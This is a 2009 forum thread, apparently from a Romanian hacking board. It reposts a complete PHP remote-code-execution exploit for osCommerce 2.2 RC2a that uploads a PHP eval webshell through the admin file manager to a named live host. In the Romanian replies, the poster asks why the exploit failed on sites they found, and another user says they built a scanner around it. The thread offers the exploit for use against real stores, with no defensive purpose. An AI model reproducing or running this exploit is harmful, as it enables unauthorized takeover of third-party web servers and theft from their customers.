adi003 Posted September 8, 2009 Report Posted September 8, 2009 <?phpprint_r('+---------------------------------------------------------------------------+osCommerce Online Merchant 2.2 RC2a RCE Exploitby Flyh4tmail: phpsec@hotmail.comteam: http://www.wolvez.orgdork: Powered by osCommerceGr44tz to q1ur3n ?puret_t?uk?toby57 and all the other members of WSTThx to exploits of blackh+---------------------------------------------------------------------------+');$host ='democn.51osc.com';$path = '/';$admin_path = 'admin/';$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>";$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";$message.="Accept-Language: zh-cn\r\n";$message.="Content-Type: application/x-www-form-urlencoded\r\n";$message.="Accept-Encoding: gzip, deflate\r\n";$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";$message.="Host: $host\r\n";$message.="Content-Length: ".strlen($shellcode)."\r\n";$message.="Connection: Close\r\n\r\n";$message.=$shellcode;$fd = fsockopen($host,'80');if(!$fd){ echo '[~]No response from'.$host; die;}fputs($fd,$message);echo ("[+]Go to see U webshell : $host/fly.php");?># milw0rm.com [2009-08-31]stiu ca o sa par noob dar am gasit siteuri care au aceasta vers. dar nu a functionat. fac ceva gresit? Quote
napoletanii Posted September 11, 2009 Report Posted September 11, 2009 am facut un mic scanner cu exploitu asta sa vad cum se cumporta:) , binenteles din lipsa de ocupatie e ora 6 dim asa ca voi reveni cu detalii diseara Quote
adi003 Posted September 11, 2009 Author Report Posted September 11, 2009 abia astept detaliile. dar l-ai testat si ti-a mers? Quote
